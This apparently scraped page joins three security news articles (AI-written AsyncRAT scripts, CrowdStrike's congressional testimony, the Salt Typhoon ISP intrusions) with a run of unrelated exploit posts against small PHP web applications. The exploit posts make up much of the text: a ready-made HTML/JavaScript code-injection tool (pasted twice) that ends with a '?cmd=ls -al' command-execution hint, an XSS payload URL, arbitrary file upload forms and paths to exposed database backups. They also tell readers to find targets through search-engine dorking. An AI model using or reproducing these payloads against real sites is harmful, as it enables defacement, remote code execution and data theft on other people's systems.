Researchers have uncovered one of the first examples of threat actors using artificial intelligence chatbots for malware creation, in a phishing attack spreading the open source remote access Trojan.

Source: Irene R via Shutterstock

Threat actors have used generative artificial intelligence (GenAI) to write malicious code in the wild to spread an open source remote access Trojan (RAT). It's one of the first observed examples of attackers weaponizing the chatbot technology for this purpose.

Researchers from HP Wolf Security have found evidence of the campaign, in which the attackers used GenAI to help them write VBScript and JavaScript code that was then used to distribute the AsyncRAT, an easily accessible, commercial malware that can be used for controlling a victim's computer.

The researchers first noticed the behavior when investigating a suspicious email in June. It had "an unusual French email attachment" posing as an invoice, HP Wolf Security revealed in its "Threat Insights Report" (PDF) for this month. The researchers ultimately discovered a campaign that was using both scripting types — code that was not, as it usually is, obfuscated — to spread AsyncRAT.

"The scripts' structure, comments, and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," according to the report.

It's widely believed that attackers already have used GenAI to help them write more convincing phishing emails, but so far there has been little evidence of the use of the technology to write malicious code, largely because legitimate chatbot tools have guardrails that prevent malicious use. However, security experts have known since the advent of the technology that it was only a matter of time before threat actors would find a way around those gates, and malicious chatbot development is a phenomenon on the Dark Web.

Related:Dark Reading Confidential: The CISO and the SEC

The campaign demonstrates that attackers are quickly leveling up in their use of GenAI in a way that should put defenders on alert, the researchers noted. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints or malicious files before they even reach someone's inbox," according to the report.

**Investigating a Malicious Email Campaign**

Once the researchers discovered the disguised invoice, they dug deeper to find that the attachment was simply an HTML file which, when opened in the browser, asks for a password. At first they believed the threat to be an HTML-smuggling attack; however, it didn't behave the way other threats do in that the payload stored inside the HTML file was not encrypted inside an archive.

Instead, the file was encrypted within the JavaScript code itself, using the Advanced Encryption Standard (AES) and implementing it without making any mistakes. This meant that for researchers to decrypt the file, they needed the correct password.

Related:How Should CISOs Navigate the SEC Cybersecurity and Disclosure Rules?

Eventually, the research team brute-forced the correct password to the file and found that the decrypted archive contained a VBScript file that, when run, starts an infection chain that ultimately deploys the AsyncRAT. "The VBScript writes various variables to the Windows Registry, which are reused later in the chain," according to the report.

Part of that infection chain is the drop of a JavaScript file into the user directory that then reads a PowerShell script from the registry and injects it into a newly started PowerShell process. The PowerShell script then makes use of the other registry variables, and runs two more executables, which start the malware payload after injecting it into a legitimate process.

**Unpacking GenAI-Generated Scripts**

It was through a deeper analysis of both the VBScript and the JavaScript used in the infection chain that the researchers noticed that the code was not obfuscated, which seemed odd because code obfuscation is something attackers typically use to cover their tracks.

"In fact, the attacker had left comments throughout the code, describing what each line does — even for simple functions," according to the report. "Genuine code comments in malware are rare because attackers want to their make malware as difficult to understand as possible."

Related:Cybersecurity Success Hinges on Full Organizational Support, New CompTIA Report Asserts

This behavior and the scripts' structure, consistent comments for each function, and the choice of function names and variables, made it reasonably clear that the attacker used GenAI to develop the scripts, according to HP Wolf Security.

Now that threat actors are starting to harness GenAI in their attack strategies, defenders also should integrate the technology into their security posture to fight fire with fire. Organizations can use GenAI to recognize patterns of threats to identify unauthorized access or malicious intent before attackers have a chance to infiltrate an environment. Indeed, the same efficiencies that GenAI create in an attack flow for malicious actors also can be leveraged by defenders to make their jobs easier, the security researchers said.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

GenAI Writes Malicious Code to Spread AsyncRAT

The company said the rogue update that caused disruptions on a global scale resulted from a "perfect storm" of issues.

Source: wisely via Shutterstock

A contrite CrowdStrike executive this week described the company's faulty July 19 content configuration update that crashed 8.5 million Windows systems worldwide as resulting from a "perfect storm" of issues that have since been addressed.

Testifying before members of the House Committee on Homeland Security on Sept. 24, CrowdStrike's senior vice president, Adam Meyers, apologized for the incident and reassured the committee of steps the company has implemented since then to prevent a similar failure.

The House Committee called for the hearing in July after a CrowdStrike content configuration update for the company's Falcon Sensor caused millions of Windows systems to crash, triggering widespread and lengthy service disruptions for businesses, government agencies, and critical infrastructure organizations worldwide. Some have pegged losses to affected organizations from the incident to be in the billions of dollars.

**Chess Game Gone Awry**

When asked to explain the root cause for the incident, Meyers told the House Committee that the problem stemmed from a mismatch between what the Falcon sensor expected and what the content configuration update actually contained.

Essentially, the update caused Falcon Sensor to try and follow a threat detection configuration for which there were no corresponding rules on what to do. "If you think about a chessboard \[and\] trying to move a chess piece to someplace where's there's no square," Meyers said. "That's effectively what happened inside the sensor. This was kind of a perfect storm of issues."

CrowdStrike's validation and testing processes for content configuration updates did not catch the issue because this specific scenario had not occurred before, Meyers explained.

Rep. Morgan Luttrell of Texas characterized CrowdStrike's failure to spot the buggy update as a "very large miss," especially for a company with a large presence in government and critical infrastructure sectors. "You mentioned North Korea, China, and Iran \[and other\] outside actors are trying to get us every day," Luttrell said during the hearing. "We shot ourselves in the foot inside of the house," with the faulty update. Luttrell demanded to know what preventive measures CrowdStrike has implemented since July.

In his written testimony and responses to questions from committee members, Meyers listed several changes that CrowdStrike has implemented to prevent against a similar lapse. The measures include new validation and testing processes, more control for customers over how and when they receive updates, and a phased rollout process that enables CrowdStrike to quickly reverse an update if problems surface. Following the incident, CrowdStrike has also begun treating all content updates as code, meaning they receive the same level of scrutiny and testing as code updates.

**Multiple Changes**

"Since July 19, 2024, we have implemented multiple enhancements to our deployment processes to make them more robust and help prevent recurrence of such an incident — without compromising our ability to protect customers against rapidly-evolving cyber threats," Meyers said in written testimony.

Meyers defended the need for companies like CrowdStrike to be able to continue making updates at the kernel level of the operating system when committee members probed him about the potential risks associated with the practice. "I would suggest that while things can be conducted in user mode, from a security perspective, kernel visibility is certainly critical," he stated. In its root cause analysis of the incident, CrowdStrike noted that considerable work still needs to happen within the Windows ecosystem for security vendors to be able to issue updates directly to user space instead of the Windows kernel.

**Missing the Bigger Picture?**

But some viewed the hearing as not going far enough to identify and focus on some of the more significant takeaways from the incident. "To think of the July 19 outage as a CrowdStrike failure is simply wrong," says Jim Taylor, chief product and technology officer at RSA. "More than 8 million devices failed, and it's not CrowdStrike's fault that those didn't have backups built to withstand an outage, or that the Microsoft systems they were running couldn't default to on-premises backups," he notes.

The global outage was the result of organizations for years abdicating responsibility for building resilient systems and instead relying on a limited number of cloud vendors to carry out critical business functions. "Focusing on one company misses the forest for the trees," Meyers says. "I wish the hearing had done more to ask what organizations are doing to build resilient systems capable of withstanding an outage."

Grant Leonard, chief information security officer (CISO) of Lumifi, says one shortcoming of the hearing was overemphasis on the root cause of the outage and relatively less focus on lessons learned. "Questions about CrowdStrike's decision-making process during the crisis, their communication strategies with affected clients, and their plans for preventing similar incidents in the future would have provided more actionable insights for the industry," Leonard says. "Exploring these areas could help other companies improve their incident response protocols and quality assurance processes."

Leonard expects the hearing will result in a renewed emphasis on quality assurance processes across the cybersecurity industry. "We will likely see an uptick in solid reviews and trial runs of business continuity and disaster recovery plans," he says. The incident could also lead to a more cautious approach to auto-updates and patching across the industry, with companies implementing more rigorous testing protocols. "Additionally, it could prompt a reevaluation of liability and indemnity clauses in cybersecurity service contracts, potentially shifting the balance of responsibility between vendors and clients."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CrowdStrike Offers Mea Culpa to House Committee

The state-sponsored advanced persistent threat (APT) is going after high-value communications service provider networks in the US, potentially with a dual set of goals.

Source: BSIP SA via Alamy Stock Photo

A freshly discovered advanced persistent threat (APT) dubbed "Salt Typhoon" has reportedly infiltrated Internet service provider (ISP) networks in the US, looking to steal information and potentially set up a launchpad for disruptive attacks.

Citing "people familiar with the matter," the Wall Street Journal broke the news on Sept. 25 that the Chinese-sponsored state hackers have successfully targeted "a handful" of cable and broadband service providers during the campaign.

Other details are scant, but Salt Typhoon's efforts highlight China's priorities when it comes to geopolitical realities, researchers note.

**A Sprinkle of Espionage, A Dash of Pre-Positioning**

For instance, a position within the service provider network would offer valuable reconnaissance for how to further target high-value marks working for the federal government, law enforcement, manufacturers, military contractors, and Fortune 100 companies. 

"Obtaining access to ISPs would make it easier to survey those users of the ISPs for information on their location and what kinds of services are being accessed," says Sean McNee, vice president of research and data at DomainTools. "Bad actors could get information about the ISP's users, where they live and billing information, and what kind of access or usage they have, \[who they call, and\] text messages."

But the concern doesn't stop there. Given China's desire to control Taiwan and other assets in the region, there's very likely a military component to the campaign as well.

"Based on the recent history of Chinese-sponsored cyber campaigns and warnings from \[the Cybersecurity and Infrastructure Security Agency\] and FBI, China has escalated from surveillance-only goals toward installing an offensive capability to disrupt critical US civilian and military infrastructure," warns Sean Deuby, principal technologist at Semperis. "This could potentially range from 'blinking the lights' to dissuade US intervention to actively delaying or crippling a US response to Chinese activities."

There's precedent for that assessment. Microsoft outed Volt Typhoon in January and its alarming efforts to plant itself inside military bases, critical infrastructure assets, and telecom infrastructure — all with the goal of being able to cause outages, disrupt communications, and sow panic in the event of a kinetic conflict with the US in the South China Sea. Since then, China has denied the allegations, while the APT has been actively expanding its efforts despite its cover being blown.

**China's Recipe: Targeting Telecom, ISPs, Critical Infrastructure**

The development is the latest in a string of Chinese-sponsored efforts to subvert critical infrastructure in the US and destabilize Pacific Rim allies, many flagged by Microsoft using hurricane-related names.

For instance, a Chinese threat actor known as Flax Typhoon emerged a year ago, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent spy operation against entities in Taiwan. Last week, news emerged that the APT had built a 200,000-device Internet of Things (IoT) botnet in order to gain a foothold in government, military, and critical manufacturing targets in the US.

There's also the APT that Microsoft calls Brass Typhoon (aka APT41, Earth Baxia, and Wicked Panda) that recently attacked Taiwanese government agencies, Filipino and Japanese military, and energy companies in Vietnam, installing backdoors for cyberespionage purposes.  

On top of that, other China-linked groups have made a name for themselves in specifically targeting communications service providers, such as Mustang Panda, especially in Taiwan and other countries of interest.

"Chinese-backed threat actors have been conducting attacks against telcos for as long as I can remember," Semperis' Deuby says. "Historically, their goals are to create 'persistence' in the carrier. By that I mean they will infiltrate a target, gain a foothold, and then move laterally with the goal of maintaining persistence and extracting data from strategic targets as needed."

He adds that lurking and listening is a specialty: "While Chinese government actors were behind the infamous Operation Soft Cell campaign in 2019, where the threat actor stole call data records, they had infiltrated some of the telcos more than five years before being discovered."

**Communications Service Provider Defenses Need Seasoning**

The ongoing targeting of communications infrastructure should put carriers and service providers on notice to harden their defenses.

Aside from phishing and social engineering of employees, Terry Dunlap, chief security strategist at NetRise, notes that firmware and supply chain attacks using core network gear could both be attack avenues against ISPs.

"ISPs' blind spots are the firmware running their devices. Most firmware contains insecure or sloppy code that can be easily exploited, if discovered," he notes. "Another attack vector would be the supply chain. For example, if the Ethernet controller in a router or switch is supplied by a Chinese company, there are scenarios where malicious code or backdoors could be integrated into that Ethernet controller, providing an adversary easy access to that important piece of networking equipment."

In 2020, the World Economic Forum and its global partners developed a set of best practices for ISPs (PDF), including principles such as sharing threat intelligence between peers, working more closely with hardware manufacturers to increase minimum levels of security, and improving routing security, Deuby says.

Still, "as someone that's talked to many organizations about the well-understood security steps they should be taking versus their actual security posture, I'm sure plenty of gaps remain."

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs

PHP SPM version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php spm 1.0 php code injection Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP SPM 1.0 Code Injection

PHP ACRSS version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php acrss 1.0 php code injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-acrss-zip.zip                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP ACRSS 1.0 Code Injection

Online mcq System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Online mcq System 1.0 XSS vulnerability                                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202304/kashipara.com_onlinemcq-zip.zip                        |=============================================================================================================================================[+] POC :[+] use Payload : feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback'"()%26%25<acx><ScRiPt >prompt(990455)</ScRiPt>   [+] http://127.0.0.1/onlinemcq/feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(990455)%3C/ScRiPt%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online mcq System 1.0 Cross Site Scripting

Online Job Search System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================| # Title     : Online Job Search System 1.0 Remote File Upload Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/online-job-search-system-using-php-mysql-source-code/?wpdmdl=8545&refresh=66bbf77f15e8c1723594623       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 10.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Submit Application</title></head><body>    <h2>Submit Application</h2>    <form action="http://127.0.0.1/eris/process.php?action=submitapplication&JOBID=2" method="POST" enctype="multipart/form-data">                <div class="form-group">            <label for="picture">Upload your picture:</label>            <input type="file" name="picture" id="picture" required>        </div>                <div class="form-group">            <button type="submit">Submit</button>        </div>    </form></body></html>[+] path : http://127.0.0.1/eris/applicant/photosGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online Job Search System 1.0 Arbitrary File Upload

Online Flight Booking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================================================  
| # Title     : Online Flight Booking System 1.0 Remot File Upload vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/online-flight-booking-management-system-source-code/?wpdmdl=5913&refresh=66bbf742d7abc1723594562                        |  
=============================================================================================================================================================================

[+] POC :

[+] The following html code uploads a executable malicious file remotely .

   [+] Line 28 : Set your Target.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>RFU</title>  
</head>  
<body>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/Online_Flight_Booking_Management_System/admin/ajax.php?action=save_settings", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Path : http://127.0.0.1/Online_Flight_Booking_Management_System/assets/img

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Online Flight Booking System 1.0 Arbitrary File Upload

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

**Multi Branch School Management System 3.5 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | b4c3fb3408f8d7a80baf2b5ec0b035520c60a8b287134c61abe01863834639ea

Download | Favorite | View

**Multi Branch School Management System 3.5 Backup Disclosure**

    =============================================================================================================================================| # Title     : Multi Branch School Management System 3.5 Backup Disclosure Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://school.ramomcoder.com/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /uploads/db_backup/[+] http://127.0.0.1/Multi/uploads/db_backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Multi Branch School Management System 3.5 Backup Disclosure

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | e760cf3c5b44d7d8984817fcf92204fd9912a026b5d02720406cc72f12ac70ed

Download | Favorite | View

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

    =============================================================================================================================================| # Title     : Complete Multi Hospital Management System 1.0 Backup Disclosure Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/free-download-complete-multi-hospital-management-system/                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /files/backups/[+] http://127.0.0.1/multihospital/files/backups/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Tag

#windows